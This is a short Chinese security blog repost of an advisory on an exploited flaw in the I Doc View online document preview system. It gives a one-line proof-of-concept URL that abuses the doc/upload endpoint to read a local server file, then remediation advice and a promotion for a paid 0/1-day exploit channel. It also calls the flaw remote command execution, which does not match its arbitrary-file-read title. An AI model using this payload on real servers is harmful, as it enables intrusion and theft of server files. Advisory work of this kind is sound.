在野1day｜I Doc View在线文档预览任意文件读取

简介

I Doc View在线文档预览是一款在线文档预览系统，可以实现文档的预览及文档协作编辑功能。其存在代码执行漏洞，使得攻击者可以通过利用这个接口，触发服务器下载并解析恶意文件，从而导致远程命令执行漏洞。进而控制服务器上的进程和文件。

0x02 漏洞复现

POC:

http://xxxxxx/doc/upload?token=testtoken&url=file:///C:/windows/win.ini&name=test.txt

0x03 修复建议

1、更新 I Doc View 在线文档预览系统至安全版本：

https://www.idocv.com/

2、临时屏蔽doc/upload接口。

推广一波自己的星球：

安全绘景：持续更新0/1day的poc、红队技巧、实战文章、实用工具等资源，欢迎各位师傅来扰，不满意直接退款。最后祝愿各位师傅天天高危

原文始发于微信公众号（安全绘景）：在野1day｜I Doc View在线文档预览任意文件读取

• 本文由 admin 发表于 2023年12月14日14:00:55
• 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出)：
                 在野1day｜I Doc View在线文档预览任意文件读取http://cn-sec.com/archives/2298715.html

• 目录
• 在线咨询

  13688888888

  8888 QQ在线咨询

  微信

  
• 

  本页二维码